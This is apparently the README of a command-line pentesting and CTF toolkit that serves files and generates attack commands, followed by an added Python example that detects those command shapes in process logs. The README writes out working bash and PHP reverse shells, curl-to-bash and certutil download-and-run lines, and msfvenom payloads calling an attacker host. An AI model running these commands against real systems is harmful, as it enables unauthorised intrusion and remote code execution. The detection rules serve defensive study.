🛠️ Pentest Server Suite (PSS) 🛡️

Pentest Server Suite (PSS) is a versatile toolkit designed to aid in pentesting and CTF challenges by providing a streamlined command-line interface for various tasks. It simplifies serving and receiving files over the HTTP, FTP, and SMB protocols, generates reverse shells, and facilitates the creation of commands for tasks like downloading/uploading/executing files and setting up listeners.

🚀 Features

  • Serve/Receive files over:
    • HTTP 🌐 (with template support)
    • SMB 🔒
    • FTP 📂
  • Generate reverse shells:
    • Create copy & paste commands for tools like netcat, socat and the most commonly used shells 🐚
  • Generate commands for:
    • Downloading/executing files using tools like curl 📥
    • Setting up listeners with netcat, socat, etc. 🎧
    • Creating msfvenom/nim shell payloads 🚀

⚙️ Installation

Clone the repository and install dependencies:

apt install python3.12 python3.12-full python3.12-dev python3.12-venv -y
cd ~ && git clone https://github.com/Jnnshschl/PentestServerSuite.git pss
chmod +x ~/pss/pss.sh
ln -s ~/pss/pss.sh /usr/bin/pss

Start the server:

pss -S ./Tools/

🚀 Usage Examples

Generate common commands

While doing CTFs, you will reach the point where you need a reverse shell command, need to download or upload a file to the system, or need to execute a script in memory using PowerShell. PSS makes it very easy to generate such commands in a copy & paste approach:

# This assumes you have the "winPEASx64.exe" in your serve folder under windows/winpeas/
# Hint: to install winpeas using githubtools, type the following command:
#       pss> githubtools add windows winpeas https://github.com/carlospolop/PEASS-ng .+\.exe
pss> launcher generate ftp/cmd-ftp-download windows/winpeas/winPEASx64.exe

# PSS is going to generate a copy&paste ready command to download the "winPEASx64.exe" using cmd.exe and ftp from the pss FTP server:
cmd.exe /c "@echo open 192.168.1.51 21>kpaowusl.txt&@echo binary>>kpaowusl.txt&@echo GET windows/winpeas/winPEASx64.exe >>kpaowusl.txt&@echo quit>>kpaowusl.txt&@ftp -A -s:kpaowusl.txt -v -i&del kpaowusl.txt"

# The same can be done for running linpeas using curl piped into /bin/bash:
# Hint: to install linpeas using githubtools, type the following command:
#       pss> githubtools add linux linpeas https://github.com/carlospolop/PEASS-ng .+\.sh
pss> launcher generate http/curl-shell linux/linpeas/linpeas.sh

curl -sSL 'http://192.168.1.51/linux/linpeas/linpeas.sh' | /bin/bash

# To change the shell binary or network interface, type:
pss> set SHELLBIN /bin/sh
pss> set SHELLBIN /bin/zsh

pss> set LHOST 10.0.0.6
# or by NIC name
pss> set LHOST tun0

Generate a simple bash reverse shell:

pss> shell build bash/i_c
# /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.51/4711 0>&1'

Generate PHP code to launch a reverse shell (the shell will also be served over HTTP at http://192.168.1.5/php/system):

pss> shell set bash/i_c
pss> stager build php/system
# <?php system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.51/4711 0>&1'"); ?>

Git-/Githubtools Plugins

PSS can manage your commonly used tools from git repositories and GitHub releases (more ways to come) using the gittools and githubtools plugins.

Tools can be updated using these commands:

pss> githubtools update
pss> gtools update

Example to get every .zip file from the releases of the https://github.com/antonioCoco/RunasCs repository (unzipping will be done automatically):

# githubtools add <OPERATING_SYSTEM> <TOOL_NAME> <GITHUB_URL> <FILENAME_REGEX>
pss> githubtools add windows runascs https://github.com/antonioCoco/RunasCs/releases/tag/v1.5 .+\.zip

Example to clone the https://github.com/3ndG4me/AutoBlue-MS17-010 repository into your tools folder:

# gittools add <OPERATING_SYSTEM> <TOOL_NAME> <GIT_REPO_URL>
pss> gittools add windows https://github.com/3ndG4me/AutoBlue-MS17-010.git

Msfvenom Generator

PSS can utilize the msfvenom command to generate temporary executables with the configured LHOST and LPORT for you to use like this:

# msfv <TYPE> <OUTPUT_FORMAT>
pss> msfv windows/x64/shell_reverse_tcp exe

# command that is going to be used:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.51 LPORT=4711 -f exe -o /usr/share/tools/tmp/48593963.exe

After doing this, you could upload and run the exe using a launcher:

pss> launcher generate http/certutil-run tmp/48593963.exe
certutil.exe -urlcache -split -f "http://192.168.1.51/tmp/48593963.exe" ".\48593963.exe" && .\48593963.exe

BaseX/URL encoding

Supported encodings: base16, base32, base64, base85, URLencoding

pss> base32 encode testSample
ORSXG5CTMFWXA3DF

pss> base32 decode ORSXG5CTMFWXA3DF
testSample

pss> url encodeall http://192.168.1.51/tmp/48593963.exe
%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%35%31%2f%74%6d%70%2f%34%38%35%39%33%39%36%33%2e%65%78%65

pss> url decode %68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%35%31%2f%74%6d%70%2f%34%38%35%39%33%39%36%33%2e%65%78%65
http://192.168.1.51/tmp/48593963.exe
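
The launcher and shell commands shown in this README have recognizable shapes in process-creation logs, and `url encodeall` output has to be decoded before any URL pattern can match. The following is an added example, not part of PSS: a small Python matcher whose rule names, regexes and sample events are constructed here for illustration.

```python
import re
from urllib.parse import unquote

# Rules modelled on the command shapes shown in this README (names are hypothetical).
RULES = {
    "cmd-ftp-script": re.compile(r"\bftp(\.exe)?\b.*\s-s:\S+", re.I),
    "curl-pipe-shell": re.compile(r"\bcurl\b[^|]*\|\s*(/bin/)?(ba|z)?sh\b", re.I),
    "bash-dev-tcp": re.compile(r"/dev/tcp/\d{1,3}(\.\d{1,3}){3}/\d+"),
    "certutil-urlcache-run": re.compile(
        r"\bcertutil(\.exe)?\b.*-urlcache\b.*-f\b.*https?://", re.I),
}

def normalize(cmdline: str) -> str:
    """Undo up to three layers of percent-encoding and collapse whitespace.
    unquote() leaves invalid escapes such as %TEMP% untouched."""
    for _ in range(3):
        decoded = unquote(cmdline)
        if decoded == cmdline:
            break
        cmdline = decoded
    return " ".join(cmdline.split())

def classify(cmdline: str) -> list[str]:
    """Return the sorted names of all rules matching the normalized command line."""
    text = normalize(cmdline)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan(events):
    """Return (host, matched_rules) for every event that hits at least one rule."""
    return [(host, hit) for host, cmd in events if (hit := classify(cmd))]

# Constructed sample events: (hostname, process command line).
SAMPLE_EVENTS = [
    ("ws01", r'cmd.exe /c "@echo open 192.168.1.51 21>a.txt&@ftp -A -s:a.txt -v -i&del a.txt"'),
    ("web01", "curl -sSL 'http://192.168.1.51/linux/linpeas/linpeas.sh' | /bin/bash"),
    ("web01", "/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.51/4711 0>&1'"),
    ("ws02", 'certutil.exe -urlcache -split -f "%68%74%74%70%3a%2f%2f192.168.1.51/tmp/x.exe" x.exe'),
    ("ws03", "certutil.exe -hashfile report.pdf SHA256"),            # benign
    ("web02", "curl -sSL https://example.org/pkg.tar.gz -o pkg.tar.gz"),  # benign
]

if __name__ == "__main__":
    for host, rules in scan(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(rules)}")
```

The ws02 event only matches after normalization, because the scheme of its URL is percent-encoded in the raw command line.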